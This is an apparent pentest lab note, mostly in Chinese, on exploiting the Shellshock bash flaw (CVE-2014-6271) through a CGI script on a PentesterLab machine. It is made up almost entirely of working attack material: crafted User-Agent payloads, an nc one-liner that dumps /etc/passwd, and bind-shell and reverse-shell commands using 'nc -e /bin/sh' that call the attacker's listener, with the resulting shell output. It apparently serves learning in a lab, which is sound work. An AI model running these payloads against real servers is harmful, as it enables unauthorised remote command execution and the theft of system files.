CVE-2014-6271_Shellshock
Fingerprinting
- 找cgi:
http://10.0.2.129/cgi-bin/status
Exploitation
- 在header中(例如User-Agent)插入:
() { :;}; echo; echo 'Shellshock: Vulnerable'GET /cgi-bin/status HTTP/1.1 Host: 10.0.2.129 User-Agent: () { :;}; echo; echo 'Shellshock: Vulnerable' Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://10.0.2.129/ DNT: 1 Connection: close- 在Response會回傳
Shellshock: Vulnerable字樣
- 在Response會回傳
- 或者用echo送
root@kali:~# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80 HTTP/1.1 200 OK Date: Wed, 23 Nov 2016 22:19:58 GMT Server: Apache/2.2.21 (Unix) DAV/2 root: x:0:0:root:/root:/bin/sh lp: x:7:7:lp:/var/spool/lpd:/bin/sh nobody: x:65534:65534:nobody:/nonexistent:/bin/false tc: x:1001:50:Linux User,,,:/home/tc:/bin/sh pentesterlab: x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh Content-Length: 175 Connection: close Content-Type: application/json
Bind shell
讓對方監聽9999 port
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80我們連過去
root@kali:~# nc -v 10.0.2.129 9999 10.0.2.129: inverse host lookup failed: Unknown host (UNKNOWN) [10.0.2.129] 9999 (?) open id uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab) uname -a Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux
Reverse Shell
我們先監聽
root@kali:~# nc -lnvp 443 listening on [any] 443 ... connect to [10.0.2.133] from (UNKNOWN) [10.0.2.129] 49030 id uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab) uname -a Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux接著同樣在User-Agent插入:
() { :;}; echo; /usr/bin/nc 10.0.2.133 443 -e /bin/bash;,送出後reverse shell就建立起來了GET /cgi-bin/status HTTP/1.1 Host: 10.0.2.129 User-Agent: () { :;}; echo; /usr/bin/nc 10.0.2.133 443 -e /bin/bash; Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://10.0.2.129/ DNT: 1 Connection: close或直接用echo送
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.2.133 443 -e /bin/sh\r\nHost: 10.0.2.129\r\nConnection: close\r\n\r\n" | nc 10.0.2.129 80